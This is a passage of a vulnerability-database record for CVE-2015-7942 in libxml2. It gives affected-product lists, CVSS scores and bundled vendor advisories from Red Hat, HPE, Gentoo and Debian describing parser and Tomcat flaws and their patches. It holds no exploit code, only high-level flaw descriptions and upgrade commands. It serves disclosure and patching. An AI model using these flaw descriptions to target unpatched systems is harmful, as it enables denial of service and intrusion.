"3.2.09" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.15" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.9.1" }, { "model": "connections docs ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.5002" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.5.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.23" }, { "model": "rational systems tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.8" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.4" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.11" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.16" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.20" }, { "model": "ipod touch", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "40" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.12" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.2" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.6" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4.1" }, { "model": "rational systems tester interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.7" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.15" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.4" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.5" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ios beta", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.12" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.5" }, { "model": "iphone", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.2" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.415" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.7.4" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.17" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.11" }, { "model": "sametime media server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.11" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "rational systems tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.1.1" }, { "model": "powerkvm build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.13" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.158" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.4" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.1" } ], "sources": [ { "db": "BID", "id": "79507" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "CNNVD", "id": "CNNVD-201511-296" }, { "db": "NVD", "id": "CVE-2015-7942" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hp:icewall_federation_agent:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_file_manager:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "2.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "9.2.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.3", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:xmlsoft:libxml2:2.9.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-7942" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Kostya Serebryany", "sources": [ { "db": "BID", "id": "79507" } ], "trust": 0.3 }, "cve": "CVE-2015-7942", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.8, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-7942", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-85903", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-7942", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201511-296", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-85903", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-7942", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-85903" }, { "db": "VULMON", "id": "CVE-2015-7942" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "CNNVD", "id": "CNNVD-201511-296" }, { "db": "NVD", "id": "CVE-2015-7942" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The xmlParseConditionalSections function in parser.c in libxml2 does not properly skip intermediary entities when it stops parsing invalid input, which allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via crafted XML data, a different vulnerability than CVE-2015-7941. Libxml2 is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application; denying service to legitimate users. Due to the nature of this issue, code-execution may be possible but this has not been confirmed. \nLibxml2 2.9.2 and prior are vulnerable. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for\nRed Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements,\nwhich are documented in the Release Notes documented linked to in the\nReferences. (CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942,\nCVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242,\nCVE-2015-8317)\n\n* A session fixation flaw was found in the way Tomcat recycled the\nrequestedSessionSSL field. If at least one web application was configured\nto use the SSL session ID as the HTTP session ID, an attacker could reuse a\npreviously used session ID for further requests. (CVE-2015-5346)\n\n* A CSRF flaw was found in Tomcat\u0027s the index pages for the Manager and\nHost Manager applications. These applications included a valid CSRF token\nwhen issuing a redirect as a result of an unauthenticated request to the\nroot of the web application. This token could then be used by an attacker\nto perform a CSRF attack. (CVE-2015-5351)\n\n* It was found that several Tomcat session persistence mechanisms could\nallow a remote, authenticated user to bypass intended SecurityManager\nrestrictions and execute arbitrary code in a privileged context via a web\napplication that placed a crafted object in a session. (CVE-2016-0714)\n\n* A security manager bypass flaw was found in Tomcat that could allow\nremote, authenticated users to access arbitrary application data,\npotentially resulting in a denial of service. (CVE-2016-0763)\n\n* A use-after-free flaw was found in the way OpenSSL imported malformed\nElliptic Curve private keys. (CVE-2015-0209)\n\n* It was found that Tomcat could reveal the presence of a directory even\nwhen that directory was protected by a security constraint. A user could\nmake a request to a directory via a URL not ending with a slash and,\ndepending on whether Tomcat redirected that request, could confirm whether\nthat directory existed. (CVE-2015-5345)\n\n* It was found that Tomcat allowed the StatusManagerServlet to be loaded by\na web application when a security manager was configured. This allowed a\nweb application to list all deployed web applications and expose sensitive\ninformation such as session IDs. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJWS-271 - User submitted session ID\nJWS-272 - User submitted session ID\nJWS-276 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-277 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate\nJWS-304 - Restrict another manager servlet - CVE-2016-0706 low\nJWS-349 - Session serialization safety - CVE-2016-0714 moderate\nJWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c04944172\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04944172\nVersion: 1\n\nHPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager\nrunning libXML2, Remote or Local Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nReferences:\n\n - CVE-2015-5312\n - CVE-2015-7497\n - CVE-2015-7498\n - CVE-2015-7499\n - CVE-2015-7500\n - CVE-2015-7941\n - CVE-2015-7942\n - CVE-2015-8241\n - CVE-2015-8242\n - CVE-2015-8317\n - PSRT110015\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - IceWall File Manager 3.0\n - IceWall Federation Agent 3.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8\nCVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE recommends applying the latest OS vendor security patches for libXML2 to\nresolve the vulnerabilities in the libXML2 library. \n\nPlease note that the HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 22 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201701-37\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libxml2: Multiple vulnerabilities\n Date: January 16, 2017\n Bugs: #564776, #566374, #572878, #573820, #577998, #582538,\n #582540, #583888, #589816, #597112, #597114, #597116\n ID: 201701-37\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in libxml2, the worst of which\ncould lead to the execution of arbitrary code. \n\nBackground\n==========\n\nlibxml2 is the XML (eXtended Markup Language) C parser and toolkit\ninitially developed for the Gnome project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/libxml2 \u003c 2.9.4-r1 \u003e= 2.9.4-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libxml2. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.9.4-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-1819\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819\n[ 2 ] CVE-2015-5312\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312\n[ 3 ] CVE-2015-7497\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497\n[ 4 ] CVE-2015-7498\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498\n[ 5 ] CVE-2015-7499\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499\n[ 6 ] CVE-2015-7500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500\n[ 7 ] CVE-2015-7941\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941\n[ 8 ] CVE-2015-7942\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942\n[ 9 ] CVE-2015-8035\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035\n[ 10 ] CVE-2015-8242\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242\n[ 11 ] CVE-2015-8806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806\n[ 12 ] CVE-2016-1836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836\n[ 13 ] CVE-2016-1838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838\n[ 14 ] CVE-2016-1839\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839\n[ 15 ] CVE-2016-1840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840\n[ 16 ] CVE-2016-2073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073\n[ 17 ] CVE-2016-3627\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627\n[ 18 ] CVE-2016-3705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705\n[ 19 ] CVE-2016-4483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483\n[ 20 ] CVE-2016-4658\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658\n[ 21 ] CVE-2016-5131\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-37\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 2.8.0+dfsg1-7+wheezy5. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.3+dfsg1-1 or earlier versions. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2015:2550-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html\nIssue date: 2015-12-07\nCVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 \n CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 \n CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 \n CVE-2015-8242 CVE-2015-8317 \n=====================================================================\n\n1. Summary:\n\nUpdated libxml2 packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSeveral denial of service flaws were found in libxml2, a library providing\nsupport for reading, modifying, and writing XML and HTML files. A remote\nattacker could provide a specially crafted XML or HTML file that, when\nprocessed by an application using libxml2, would cause that application to\nuse an excessive amount of CPU, leak potentially sensitive information, or\nin certain cases crash the application. (CVE-2015-1819, CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941,\nCVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957,\nBZ#1281955)\n\nRed Hat would like to thank the GNOME project for reporting CVE-2015-7497,\nCVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242,\nand CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the\noriginal reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and\nCVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and\nCVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. \n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1211278 - CVE-2015-1819 libxml2: denial of service processing a crafted XML document\n1213957 - libxml2: out-of-bounds memory access when parsing an unclosed HTML comment\n1274222 - CVE-2015-7941 libxml2: Out-of-bounds memory access\n1276297 - CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections()\n1276693 - CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input\n1281862 - CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey\n1281879 - CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl\n1281925 - CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW\n1281930 - CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration\n1281936 - CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar\n1281943 - CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc\n1281950 - CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode\n1281955 - libxml2: Multiple out-of-bounds reads in xmlDictComputeFastKey.isra.2 and xmlDictAddString.isra.O\n\n6. Package List:\n\nRed Hat 